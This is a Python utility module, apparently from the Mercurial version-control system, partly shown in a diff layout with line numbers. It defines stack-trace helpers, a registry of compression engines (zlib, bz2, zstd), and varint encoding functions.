
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then returns the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not to be used in production code but very convenient while developing.
    '''
    entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
               for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
               ][-depth:]
    if entries:
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)

def debugstacktrace(msg='stacktrace', skip=0,
                    f=procutil.stderr, otherf=procutil.stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then shows 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not to be used in production code but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    for line in getstackframes(skip + 1, depth=depth):
        f.write(line)
    f.flush()

class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if base in dirs:
                dirs[base] += 1
                return
            dirs[base] = 1

    def delpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if dirs[base] > 1:
                dirs[base] -= 1
                return
            del dirs[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs

if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs

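# Illustrative sketch (not part of the module): the multiset counts how many
# tracked paths live under each directory, so membership tests are cheap:
#
#   d = dirs([b'a/b/file1', b'a/file2'])
#   b'a' in d          # -> True
#   b'a/b' in d        # -> True
#   b'a/b/file1' in d  # -> False; only parent directories are recorded
#   d.delpath(b'a/b/file1')
#   b'a/b' in d        # -> False, while b'a' is still present
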
def finddirs(path):
    pos = path.rfind('/')
    while pos != -1:
        yield path[:pos]
        pos = path.rfind('/', 0, pos)

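# Illustrative sketch (not part of the module): finddirs yields every parent
# directory of a path, deepest first:
#
#   list(finddirs(b'a/b/c'))  # -> [b'a/b', b'a']
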
# compression code

SERVERROLE = 'server'
CLIENTROLE = 'client'

compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))

class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()

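# Illustrative sketch (not part of the module): engines are looked up on the
# global manager by name or by the identifiers they registered:
#
#   compengines['zlib']                 # engine instance, by name
#   compengines.forbundlename('gzip')   # by bundle spec name
#   compengines.forbundletype('GZ')     # by internal bundle identifier
#   compengines.supportedbundlenames    # e.g. {'gzip', 'bzip2', 'none', ...}
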
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of bytes of chunks representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``StorageError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()

class _CompressedStreamReader(object):
    def __init__(self, fh):
        if safehasattr(fh, 'unbufferedread'):
            self._reader = fh.unbufferedread
        else:
            self._reader = fh.read
        self._pending = []
        self._pos = 0
        self._eof = False

    def _decompress(self, chunk):
        raise NotImplementedError()

    def read(self, l):
        buf = []
        while True:
            while self._pending:
                if len(self._pending[0]) > l + self._pos:
                    newbuf = self._pending[0]
                    buf.append(newbuf[self._pos:self._pos + l])
                    self._pos += l
                    return ''.join(buf)

                newbuf = self._pending.pop(0)
                if self._pos:
                    buf.append(newbuf[self._pos:])
                    l -= len(newbuf) - self._pos
                else:
                    buf.append(newbuf)
                    l -= len(newbuf)
                self._pos = 0

            if self._eof:
                return ''.join(buf)
            chunk = self._reader(65536)
            self._decompress(chunk)
            if not chunk and not self._pending and not self._eof:
                # No progress and no new data, bail out
                return ''.join(buf)

class _GzipCompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh):
        super(_GzipCompressedStreamReader, self).__init__(fh)
        self._decompobj = zlib.decompressobj()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        # Probe for end-of-stream on a copy of the decompressor: feed it a
        # dummy byte, and if that byte comes back in unused_data the real
        # stream has been fully consumed.
        d = self._decompobj.copy()
        try:
            d.decompress('x')
            d.flush()
            if d.unused_data == 'x':
                self._eof = True
        except zlib.error:
            pass

class _BZ2CompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh):
        super(_BZ2CompressedStreamReader, self).__init__(fh)
        self._decompobj = bz2.BZ2Decompressor()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        try:
            # Drain any buffered output; BZ2Decompressor raises EOFError
            # once the end of the stream has been reached.
            while True:
                newbuf = self._decompobj.decompress('')
                if newbuf:
                    self._pending.append(newbuf)
                else:
                    break
        except EOFError:
            self._eof = True

class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
    def __init__(self, fh):
        super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
        # The stream arrives without its 'BZ' magic (already consumed
        # upstream), so prime the decompressor with it.
        newbuf = self._decompobj.decompress('BZ')
        if newbuf:
            self._pending.append(newbuf)

class _ZstdCompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh, zstd):
        super(_ZstdCompressedStreamReader, self).__init__(fh)
        self._zstd = zstd
        self._decompobj = zstd.ZstdDecompressor().decompressobj()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        try:
            while True:
                newbuf = self._decompobj.decompress('')
                if newbuf:
                    self._pending.append(newbuf)
                else:
                    break
        except self._zstd.ZstdError:
            self._eof = True

class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _GzipCompressedStreamReader(fh)

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.StorageError(_('revlog decompress error: %s') %
                                         stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())

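# Illustrative round-trip sketch (not part of the module): a bundle-style
# stream can be compressed and decompressed through any registered engine:
#
#   engine = compengines['zlib']
#   compressed = b''.join(engine.compressstream(iter([b'data'] * 100)))
#   reader = engine.decompressorreader(bytesio(compressed))
#   assert reader.read(4) == b'data'
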
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _BZ2CompressedStreamReader(fh)

compengines.register(_bz2engine())

class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        return _TruncatedBZ2CompressedStreamReader(fh)

compengines.register(_truncatedbz2engine())

class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't, because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())

3725 class _zstdengine(compressionengine):
3723 class _zstdengine(compressionengine):
3726 def name(self):
3724 def name(self):
3727 return 'zstd'
3725 return 'zstd'
3728
3726
3729 @propertycache
3727 @propertycache
3730 def _module(self):
3728 def _module(self):
3731 # Not all installs have the zstd module available. So defer importing
3729 # Not all installs have the zstd module available. So defer importing
3732 # until first access.
3730 # until first access.
3733 try:
3731 try:
3734 from . import zstd
3732 from . import zstd
3735 # Force delayed import.
3733 # Force delayed import.
3736 zstd.__version__
3734 zstd.__version__
3737 return zstd
3735 return zstd
3738 except ImportError:
3736 except ImportError:
3739 return None
3737 return None
3740
3738
3741 def available(self):
3739 def available(self):
3742 return bool(self._module)
3740 return bool(self._module)
3743
3741
3744 def bundletype(self):
3742 def bundletype(self):
3745 """A modern compression algorithm that is fast and highly flexible.
3743 """A modern compression algorithm that is fast and highly flexible.
3746
3744
3747 Only supported by Mercurial 4.1 and newer clients.
3745 Only supported by Mercurial 4.1 and newer clients.
3748
3746
3749 With the default settings, zstd compression is both faster and yields
3747 With the default settings, zstd compression is both faster and yields
3750 better compression than ``gzip``. It also frequently yields better
3748 better compression than ``gzip``. It also frequently yields better
3751 compression than ``bzip2`` while operating at much higher speeds.
3749 compression than ``bzip2`` while operating at much higher speeds.
3752
3750
3753 If this engine is available and backwards compatibility is not a
3751 If this engine is available and backwards compatibility is not a
3754 concern, it is likely the best available engine.
3752 concern, it is likely the best available engine.
3755 """
3753 """
3756 return 'zstd', 'ZS'
3754 return 'zstd', 'ZS'
3757
3755
3758 def wireprotosupport(self):
3756 def wireprotosupport(self):
3759 return compewireprotosupport('zstd', 50, 50)
3757 return compewireprotosupport('zstd', 50, 50)
3760
3758
3761 def revlogheader(self):
3759 def revlogheader(self):
3762 return '\x28'
3760 return '\x28'
3763
3761
3764 def compressstream(self, it, opts=None):
3762 def compressstream(self, it, opts=None):
3765 opts = opts or {}
3763 opts = opts or {}
3766 # zstd level 3 is almost always significantly faster than zlib
3764 # zstd level 3 is almost always significantly faster than zlib
3767 # while providing no worse compression. It strikes a good balance
3765 # while providing no worse compression. It strikes a good balance
3768 # between speed and compression.
3766 # between speed and compression.
3769 level = opts.get('level', 3)
3767 level = opts.get('level', 3)
3770
3768
3771 zstd = self._module
3769 zstd = self._module
3772 z = zstd.ZstdCompressor(level=level).compressobj()
3770 z = zstd.ZstdCompressor(level=level).compressobj()
3773 for chunk in it:
3771 for chunk in it:
3774 data = z.compress(chunk)
3772 data = z.compress(chunk)
3775 if data:
3773 if data:
3776 yield data
3774 yield data
3777
3775
3778 yield z.flush()
3776 yield z.flush()
3779
3777
    def decompressorreader(self, fh):
        return _ZstdCompressedStreamReader(fh, self._module)

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # TODO consider omitting frame magic to save 4 bytes.
            # This writes content sizes into the frame header. That is
            # extra storage. But it allows a correct size memory allocation
            # to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

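        # To summarize the tiering in compress() above: inputs under 50 bytes
        # are stored uncompressed (None is returned), inputs up to 1,000,000
        # bytes are compressed in one shot, and anything larger is streamed
        # through compressobj() in COMPRESSION_RECOMMENDED_INPUT_SIZE windows.
        # In every tier the compressed form is used only when it is strictly
        # smaller than the input.
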
        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.StorageError(_('revlog decompress error: %s') %
                                         stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())

def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n    %s') % (
            bt[0], engine.bundletype.__doc__)

        value = docobject()
        value.__doc__ = doc
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace

def safename(f, tag, ctx, others=None):
    """
    Generate a name that is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn

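# For example (illustrative names): safename('foo', 'remote', ctx) returns
# 'foo~remote' when that name is free, and otherwise probes 'foo~remote~1',
# 'foo~remote~2', ... until an unused name is found.
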
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(_("stream ended unexpectedly"
                            " (got %d bytes, expected %d)")
                          % (len(s), n))
    return s

def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    bits = value & 0x7f
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7f
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return ''.join(bytes)

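# A worked example of the encoding (illustrative): 1337 is 0b10100111001.
# The low 7 bits (0b0111001 = 0x39) are emitted first with the continuation
# bit set (0x39 | 0x80 = 0xb9), then the remaining bits (1337 >> 7 = 0b1010 =
# 0x0a) without it. Since 0x0a is the newline byte, the result renders as
# '\xb9\n' in the doctest above.
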
def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= ((byte & 0x7f) << shift)
        if not (byte & 0x80):
            return result
        shift += 7
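
# Round trip (illustrative): uvarintdecodestream(BytesIO(uvarintencode(n)))
# returns n for any n >= 0. Decoding accumulates 7 bits per byte, least
# significant group first, and stops at the first byte whose 0x80
# continuation bit is clear.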